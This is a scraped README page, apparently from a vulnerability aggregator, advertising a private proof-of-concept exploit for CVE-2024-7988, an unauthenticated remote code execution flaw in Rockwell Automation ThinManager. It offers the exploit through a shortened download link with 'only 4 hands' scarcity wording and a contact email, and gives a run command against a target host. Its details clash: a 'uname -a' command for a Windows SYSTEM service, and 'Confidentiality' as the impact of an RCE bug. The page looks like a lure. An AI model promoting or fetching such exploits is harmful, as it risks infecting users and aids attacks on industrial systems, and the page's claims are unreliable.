CVE-2024-7988 PoC — Rockwell Automation ThinManager 安全漏洞

Source

Associated Vulnerability

Description

CVE-2024-7988-Private-POC

Readme

# CVE-2024-7988: Rockwell Automation ThinManager ThinServer Unrestricted File Upload Remote Code Execution Vulnerability
# Overview:
A remote code execution vulnerability exists in the Rockwell Automation ThinManager® ThinServer™ that allows a threat actor to execute arbitrary code with System privileges. This vulnerability exists due to the lack of proper data input validation, which allows files to be overwritten.
# Exploit
## [**Download here**](https://bit.ly/4fvZzHP) 
## Details 
+ **CVE ID**: [CVE-2024-7988](https://nvd.nist.gov/vuln/detail/CVE-2024-7988)
+ **Published**: 2024-08-22 
+ **Impact**: Confidentiality
+ **Exploit**: Availability: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation ThinManager. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the ThinServer service. The issue results from the lack of proper validation of user-supplied data, which can allow the upload of arbitrary files. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.
## Affected Versions
ThinManager® ThinServer™
+ **11.1.0-11.1.7**
+ **11.2.0-11.2.8**
+ **12.0.0-12.0.6**
+ **12.1.0-12.1.7**
+ **13.0.0-13.0.4**
+ **13.1.0-13.1.2**
+ **13.2.0-13.2.1**
## Running
To run exploit you need Python 3.9. Execute:
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
+ ## Contact
+ **For inquiries, please contact: hatvixprime@outlook.com**
## [**Download here**](https://bit.ly/4fvZzHP) (Only 4 hands)
![image](https://github.com/user-attachments/assets/79088e98-57ca-4680-ab9a-a8a3b87d98b1)

File Snapshot

 [4.0K]  /data/pocs/1bd5c4b263db8df05ca95ba34dfbe29ef705787d
└── [1.7K]  README.md

0 directories, 1 file

Remarks